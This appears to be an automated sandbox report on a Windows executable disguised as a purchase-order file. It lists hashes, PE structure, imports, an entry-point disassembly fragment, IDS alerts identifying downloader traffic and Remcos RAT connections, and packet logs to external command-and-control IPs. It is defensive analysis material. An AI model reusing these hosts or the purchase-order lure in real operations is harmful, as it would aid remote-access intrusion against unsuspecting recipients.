                                                            File name:Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
                                                            File size:778'449 bytes
                                                            MD5:20d75709d275ee9fc5b559e50ae667c3
                                                            SHA1:27b41abb5cf6a0492fbd44db949ed78629548ee6
                                                            SHA256:530d877fd245da9636806e92b1b3271ccbdb89c4e08e534171469b70f2f7dc7a
                                                            SHA512:0987ce0ae8d3447034f76b11ab618b8b92f73d0e5ed50d2e5a0ba204f0a8cf830ed4795abbeebe72c035ecfa3e96391756cda8cb7f064f183cdb4554510be64f
                                                            SSDEEP:12288:GtomEHbPc17d211S7nu/s6dSf/5vJ6UuWsz6MNwXLLKqKUGpjSvI0Z:TN7Pi7Iw1aSz6n16ewXLu9UKjSvI0Z
                                                            TLSH:90F4F143FB62C0E7DB7DA3F2F9C3E6BB0DFDA5156C84955966D3AAE22400E32050E125
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................`...*......Z3.......p....@
                                                            Icon Hash:c9b9b9ad9b83e979
                                                            Entrypoint:0x40335a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x55C15CE6 [Wed Aug 5 00:46:30 2015 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                            Instruction
                                                            sub esp, 000002D8h
                                                            push ebx
                                                            push ebp
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            xor ebp, ebp
                                                            pop esi
                                                            mov dword ptr [esp+18h], ebp
                                                            mov dword ptr [esp+10h], 00409230h
                                                            mov dword ptr [esp+14h], ebp
                                                            call dword ptr [00407034h]
                                                            push 00008001h
                                                            call dword ptr [004070BCh]
                                                            push ebp
                                                            call dword ptr [004072ACh]
                                                            push 00000009h
                                                            mov dword ptr [004292B8h], eax
                                                            call 00007F45153B8FDEh
                                                            mov dword ptr [00429204h], eax
                                                            push ebp
                                                            lea eax, dword ptr [esp+38h]
                                                            push 000002B4h
                                                            push eax
                                                            push ebp
                                                            push 004206A8h
                                                            call dword ptr [0040717Ch]
                                                            push 0040937Ch
                                                            push 00428200h
                                                            call 00007F45153B8C49h
                                                            call dword ptr [00407134h]
                                                            mov ebx, 00434000h
                                                            push eax
                                                            push ebx
                                                            call 00007F45153B8C37h
                                                            push ebp
                                                            call dword ptr [0040710Ch]
                                                            push 00000022h
                                                            mov dword ptr [00429200h], eax
                                                            pop edi
                                                            mov eax, ebx
                                                            cmp word ptr [00434000h], di
                                                            jne 00007F45153B6089h
                                                            mov esi, edi
                                                            mov eax, 00434002h
                                                            push esi
                                                            push eax
                                                            call 00007F45153B8687h
                                                            push eax
                                                            call dword ptr [00407240h]
                                                            mov ecx, eax
                                                            mov dword ptr [esp+1Ch], ecx
                                                            jmp 00007F45153B617Bh
                                                            push 00000020h
                                                            pop edx
                                                            cmp ax, dx
                                                            jne 00007F45153B6089h
                                                            inc ecx
                                                            inc ecx
                                                            cmp word ptr [ecx], dx
                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x329e8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x5f0a0x60005e32878b5f332958538d1180572efaacFalse0.6613362630208334data6.449510420642677IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x90000x202f80x600bdee9c3c56769fb763ba9ed65b414b2cFalse0.484375data3.832327307800933IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x4a0000x329e80x32a002a1a63438510fc393e60de344f7865bbFalse0.40760030864197533data6.330044290302057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x4a3880x10a00Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.23011630639097744
                                                            RT_ICON0x5ad880x9a00PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9756239853896104
                                                            RT_ICON0x647880x9600Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.26375
                                                            RT_ICON0x6dd880x5600Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.2945130813953488
                                                            RT_ICON0x733880x4400Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.31301700367647056
                                                            RT_ICON0x777880x2600Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.3628700657894737
                                                            RT_ICON0x79d880x1200Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.4375
                                                            RT_ICON0x7af880xa00Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.529296875
                                                            RT_ICON0x7b9880x600Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.47265625
                                                            RT_DIALOG0x7bf880x144dataEnglishUnited States0.5216049382716049
                                                            RT_DIALOG0x7c0d00x100dataEnglishUnited States0.5234375
                                                            RT_DIALOG0x7c1d00x11cdataEnglishUnited States0.6056338028169014
                                                            RT_DIALOG0x7c2f00x60dataEnglishUnited States0.7291666666666666
                                                            RT_GROUP_ICON0x7c3500x84dataEnglishUnited States0.7045454545454546
                                                            RT_VERSION0x7c3d80x2d0dataEnglishUnited States0.49027777777777776
                                                            RT_MANIFEST0x7c6a80x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                            DLLImport
                                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-16T15:28:01.725417+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84977666.63.187.3080TCP
                                                            2024-12-16T15:28:08.151051+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.849792162.251.122.872404TCP
                                                            2024-12-16T15:28:10.366696+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.849798162.251.122.872404TCP
                                                            2024-12-16T15:28:10.656732+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.849799178.237.33.5080TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 16, 2024 15:28:00.233591080 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:00.353569984 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:00.353701115 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:00.354224920 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:00.474073887 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725184917 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725224972 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725239992 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725310087 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725326061 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725342035 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725358009 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725416899 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.725467920 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.725512028 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725527048 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725544930 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.725594044 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.725605965 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.845530987 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.845645905 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.845702887 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.845732927 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.849678040 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.849750996 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.918742895 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.918870926 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.918919086 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.918971062 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.922234058 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.922292948 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.922311068 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.922372103 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.933609009 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.933628082 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.933697939 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.939384937 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.939456940 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.939529896 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.939584017 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.947669983 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.947690010 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.947762012 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.947801113 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.956131935 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.956218958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.956273079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.956336021 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.964505911 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.964525938 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.964629889 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.972676039 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.972774982 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.972775936 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.972826958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.981146097 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.981229067 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.981244087 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.981296062 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.990181923 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.990200043 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.990242958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.990264893 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:01.998136044 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.998156071 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:01.998243093 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.039006948 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.039077997 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.039134979 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.039180040 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.110239983 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.110328913 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.110378027 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.110450983 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.112631083 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.112694025 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.112777948 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.112838984 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.117372990 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.117438078 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.117495060 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.117552042 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.122109890 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.122173071 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.122294903 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.122354984 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.126843929 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.126900911 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.126945019 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.126996040 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.131609917 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.131674051 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.131725073 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.131783009 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.136439085 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.136509895 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.136619091 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.136679888 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.141170979 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.141280890 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.141299009 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.141398907 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.145910025 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.145977020 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.146043062 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.146106958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.150549889 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.150612116 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.150743008 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.150804996 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.155230045 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.155299902 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.155411959 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.155474901 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.159962893 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.160022974 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.160104036 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.160156965 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.164700031 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.164760113 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.164833069 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.164886951 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.169435978 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.169497967 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.169537067 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.169591904 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.173094988 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.173156023 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.173214912 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.173265934 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.176747084 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.176778078 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.176860094 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.176877022 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.180445910 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.180504084 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.180546045 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.180594921 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.184214115 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.184271097 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.184341908 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.184396029 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.187824965 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.187879086 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.187932968 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.187988043 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.191483974 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.191540956 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.191626072 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.191680908 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.195122957 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.195182085 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.195350885 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.195408106 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.198786974 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.198843956 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.302437067 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.302576065 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.302601099 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.302742958 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.304049015 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.304066896 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.304106951 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.304148912 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.307456017 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.307518959 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.307595015 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.307653904 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.309768915 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.309847116 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.310276985 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.310340881 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.312614918 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.312681913 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.312824011 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.312877893 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.315582991 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.315648079 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.315661907 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.315706968 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.318181038 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.318291903 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.318330050 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.318377018 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.320952892 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.321002960 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.321033001 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.321084976 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.323548079 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.323607922 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.323856115 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.323909998 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.326236010 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.326307058 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.326572895 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.326621056 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.328793049 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.328845024 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.329165936 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.329214096 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.331423998 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.331482887 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.331576109 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.331621885 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.334007025 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.334060907 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.334101915 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.334155083 CET4977680192.168.2.866.63.187.30
                                                            Dec 16, 2024 15:28:02.336678028 CET804977666.63.187.30192.168.2.8
                                                            Dec 16, 2024 15:28:02.336730003 CET4977680192.168.2.866.63.187.30
